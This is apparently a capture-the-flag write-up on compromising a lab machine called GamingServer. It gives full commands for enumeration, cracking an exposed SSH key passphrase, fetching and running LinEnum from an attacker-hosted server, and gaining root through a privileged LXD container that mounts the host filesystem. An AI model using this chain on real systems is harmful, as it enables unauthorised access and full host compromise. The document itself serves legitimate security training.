Introduction
This guide details a penetration testing process on a GamingServer using tools like Nmap for port scanning, Gobuster for directory enumeration, and John the Ripper for password cracking. Key findings include open ports for SSH and a web server, discovery of sensitive directories and files, and use of the dict.lst file for cracking a private SSH key. Further steps involve using LinEnum for privilege escalation by exploiting membership in the lxc group and deploying an Alpine Linux container to gain root access and retrieve the final flag.
Enumeration and Port Scanning
we will use Nmap to scan for open ports and services using the following command: sudo nmap -sV -sC 10.10.175.143 -oA nmap_default.
Our results show that we have two open ports, one for SSH and port 80 for the webserver. Since we donβt have the SSH login credentials yet, we will view the web server and look for potential hints or interesting information.
When I viewed the website, nothing stood out, so I decided to view the page source. There, I found some interesting information in the form of an HTML comment. The comment referenced a user name, John. This could be important information and could be a potential login to the server.
The next step was to perform a directory enumeration using Gobuster to find any potential hidden directories or files. the command I used is the following command:
gobuster dir -u http://10.10.175.143/ -x php,html,txt -w /usr/share/dirb/wordlists/common.txt.
from the results, we see there is a robot.txt file that could contain sensitive information /secret/ and an /uploads/ directory. We will visit the directories for further investigations.
The robots.txt had the /uploads directory listed as allowed. After visiting the /uploads directory I found an interesting dict.lst file which is a file that can be used to brute credentials. We will download it to our machine using the below command: wget -O dict.lst http://10.10.175.143/uploads/dict.lst
visiting the /secret directory, I found a file named secretKey.This could contain the passphrase/password we require to log in as John on the web server. We will download it to our machine as well using the below command:wget -O id_rsa http://10.10.175.143/secret/secretKey.
The next step will be to try and log in using our gained credentials to see if we will gain access. before that, we have to change the permission for the id_rsa key file since It contains a private SSH key. By doing this we ensure that we are the owners of the key and can use it to log in otherwise ssh login will not be successful. The command to this is chmod 600 id_rsa.
when trying to log in using the ssh -i id_rsa john@10.10.175.143.command we are required to enter a passphrase that we can crack using the dict.lst file we had discovered. We are going to use John the Ripper for this. we are going to extract the passphrase from the private key using the following command; python /usr/share/john/ssh2john.py id_rsa > id_rsa_Hash.txt.
next, we will perform the password cracking using the following command: john --wordlist=/home/kali/GamingServer/dict.lst id_rsa_Hash.txt. after a few moments, the cracking process was complete and the passphrase was to be letmein.Now we can log in successfully.
for the user flag.txt, we can find in Johnβs directory.
for the root flag, we have to escalate our privilege to root.
Privilege Escalation
I will be using an automated tool called LinEnum which helps in identifying potential vectors that we can use for privilege escalation. I will transfer this tool to the attack machine using the Python Local server.
python3 -m http.server 8000
on the attack machine, I will download the file using the wget command
wget http://10.9.2.114:8000/LinEnum.sh
After downloading the file I gave it the executable permission using the chmod +x command.To run the file use ./LinEnum.sh. From the results, I found out that we are members of the lxc group.
LXD (Linux Container Daemon) is a container management tool that provides a system-wide daemon for managing containers. It operates on top of Linux Containers (LXC) and offers additional features like snapshots, image management, and REST API for container orchestration.
Exploitation Process:
Import a Custom Alpine Image: Download and import a lightweight Alpine Linux image with additional capabilities on our local machine and transfer it to the target machine via the local HTTP server:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build -alpine
Next, we need to copy the compressed file to the target machine and then import the image using lxc.
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxc image list
Launch a Container: Create and launch a container using the imported Alpine image:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc start ignite
Our container has been created. Now we can start the container and read our final flag in the /mnt/root/root directory!
lxc exec ignite /bin/sh
To obtain the final.txt file in the /mnt/root/root.
Conclusion
The LXD exploitation, in particular, highlighted the critical importance of robust system configuration and user permissions. A single misstep can provide attackers with a foothold, enabling them to compromise sensitive systems and data. This exercise reinforced the significance of continuous learning and adaptation in the face of evolving threats. Regular system audits, timely updates, and the implementation of stringent security best practices are essential to safeguard digital assets.